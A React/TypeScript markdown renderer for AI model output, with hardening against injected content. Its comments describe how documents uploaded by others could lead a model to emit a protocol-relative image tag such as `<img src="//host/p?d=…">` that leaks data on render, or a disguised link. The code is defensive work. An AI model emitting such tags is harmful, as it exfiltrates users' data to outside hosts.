// noinspection SpellCheckingInspection

import type { ElementContent, Root, RootContent } from 'hast';
import React from 'react';
import ReactMarkdown, { Components, ExtraProps } from 'react-markdown';
import { Link as RouterLink } from 'react-router';
import rehypeSanitize, { defaultSchema } from 'rehype-sanitize';
import remarkGfm from 'remark-gfm';
import type { PluggableList } from 'unified';

const sanitizeSchema = {
  ...defaultSchema,
  tagNames: [
    ...(defaultSchema.tagNames ?? []),
    'table', 'thead', 'tbody', 'tr', 'th', 'td',
    'a', 'sup',
  ],
  attributes: {
    ...(defaultSchema.attributes),
    table: [
      ...(defaultSchema.attributes?.table ?? []),
      'align', 'border', 'cellpadding', 'cellspacing'
    ],
    th: [
      ...(defaultSchema.attributes?.th ?? []),
      'align', 'colspan', 'rowspan', 'scope'
    ],
    td: [
      ...(defaultSchema.attributes?.td ?? []),
      'align', 'colspan', 'rowspan', 'headers'
    ],
    a: [
      ...(defaultSchema.attributes?.a ?? []),
      'href', 'title', 'target', 'rel'
    ],
  },
};

const LINE_BREAK = /^<br\s*\/?>$/i;

/**
 * Raw HTML in the content becomes the text it is written as.
 *
 * The content this renders is model output, and the model reads documents that anyone with
 * upload rights wrote. Parsing its HTML let `<img src="//host/p?d=…">` fetch an address on
 * render and `<a href="//host">` pose as one of our links, both past `rehype-sanitize`, which
 * keeps a URL with no scheme. So nothing is parsed. Without this, sanitize drops raw nodes
 * without a trace, and an answer that quietly loses a sentence is its own kind of wrong - the
 * same reasoning `AnswerLinkGuard` follows on the server.
 *
 * `<br>` is the one exception. It carries no address, and models put it in table cells,
 * where markdown has no other way to break a line.
 */
const rehypeRawAsText = () => (tree: Root) => {
  const visit = (parent: { children: (RootContent | ElementContent)[] }) => {
    parent.children = parent.children.map((child) => {
      if (child.type === 'raw') {
        return LINE_BREAK.test(child.value.trim())
          ? { type: 'element', tagName: 'br', properties: {}, children: [] }
          : { type: 'text', value: child.value };
      }
      if ('children' in child) visit(child);
      return child;
    });
  };
  visit(tree);
};

/**
 * Whether a link goes to a page of this app, by the same test as `citationSourcePath` and
 * the server's `AnswerLinkGuard.IsInternal`: a path from the site root. `//host` and `/\host`
 * begin with a slash and leave the site, so "starts with '/'" is not the check.
 */
const isAppPath = (href: string) => href.startsWith('/') && !/^\/[/\\]/.test(href);

/** Whether a link leaves the site somewhere named: an `http(s):` or `mailto:` address. */
const isAbsolute = (href: string) => /^(https?|mailto):/i.test(href);

const MarkdownLink = (props: React.AnchorHTMLAttributes<HTMLAnchorElement> & ExtraProps) => {
  // `node` is the hast element react-markdown passes every override. It is not an attribute.
  const { children, href, node: _node, ...rest } = props;

  if (href && isAppPath(href)) {
    // In place, through the router. A new tab loaded a second copy of the app and left the
    // conversation behind in the first one.
    return <RouterLink {...rest} to={href}>{children}</RouterLink>;
  }

  if (href?.startsWith('#')) {
    return <a {...rest} href={href}>{children}</a>;
  }

  if (!href || !isAbsolute(href)) {
    // A protocol-relative or otherwise unresolvable target is never a link we wrote. The
    // server makes these inert already; this keeps it so if that ever regresses.
    return <span>{children}</span>;
  }

  // target and rel come after the spread, not before it. Both are allowed through the
  // sanitize schema above, so markdown that sets its own `rel` would otherwise win the
  // merge and drop the reverse-tabnabbing guard on a link it also controls.
  return <a {...rest} href={href} target="_blank" rel="noopener noreferrer">{children}</a>;
};

/**
 * An image becomes its alt text. A rendered image is a request the browser makes on its own,
 * to an address the model chose, before the reader has done anything.
 */
const MarkdownImage = ({ alt }: React.ImgHTMLAttributes<HTMLImageElement>) =>
  alt ? <span>{alt}</span> : null;

type Props = {
  children: string;
  /**
   * Element overrides, for callers that render their own markup inside the content.
   *
   * `a` and `img` are not overridable - see below.
   */
  components?: Omit<Components, 'a' | 'img'>;
  /**
   * Rehype plugins that run after sanitization. What they add is trusted, which is the point:
   * an element they create cannot be forged by the content, because the content has already
   * been through the sanitizer by the time they run.
   */
  rehypePlugins?: PluggableList;
};

export default function MarkdownRenderer({ children, components, rehypePlugins }: Readonly<Props>) {
  return (
    <div className="prose max-w-none">
      <ReactMarkdown
        remarkPlugins={[remarkGfm]}
        rehypePlugins={[
          rehypeRawAsText,
          [rehypeSanitize, sanitizeSchema],
          ...(rehypePlugins ?? []),
        ]}
        // The caller's overrides first, so `a` and `img` always resolve to ours. Spreading
        // them last let a caller replace the anchor and take the target/rel handling with
        // it, which is a security property rather than a styling one.
        components={{ ...components, a: MarkdownLink, img: MarkdownImage }}
      >
        {children}
      </ReactMarkdown>
    </div>
  );
}
